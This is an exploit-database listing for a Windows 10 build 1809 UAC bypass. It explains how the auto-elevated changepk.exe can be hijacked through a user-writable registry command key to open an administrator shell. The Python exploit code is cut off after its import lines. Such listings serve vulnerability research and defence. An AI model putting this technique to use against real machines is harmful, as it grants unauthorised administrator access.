Microsoft windows 10 build 1809 local privilege escalation (uac bypass) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-01-13 |
Type : local |
Platform : windows
This exploit / vulnerability Microsoft windows 10 build 1809 local privilege escalation (uac bypass) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)
# Author: Nassim Asrir
# Date: 2019-01-10
# Exploit Author: Nassim Asrir
# CVE: N/A
# Tested On: Windows 10Pro 1809
# Vendor : https://www.microsoft.com
# Technical Details
# I discovered a Local Privilege Escalation in Windows 10 (UAC Bypass), via an auto-elevated process.
# The executable is changepk.exe. changepk is used to pass a new product key, you can pass the key also via commandline.
# By executing changepk.exe and tracing the process we can see some RegOpenKey operations that lead to open some non-found Key in the registry (HKCU).
# In our case we can use "HKCU:\Software\Classes\Launcher.SystemSettings\Shell\Open\Command" to spawn our Administrator cmd or to bypass the mmc UAC.
# Exploit
# To exploit the vulnerability you can use this python code then execute it and you will get the Windows Activation just click Yes and you will redirect the execution to cmd.exe.
# -*- coding: utf-8 -*-
import os
import sys
import ctypes
import _winreg
import time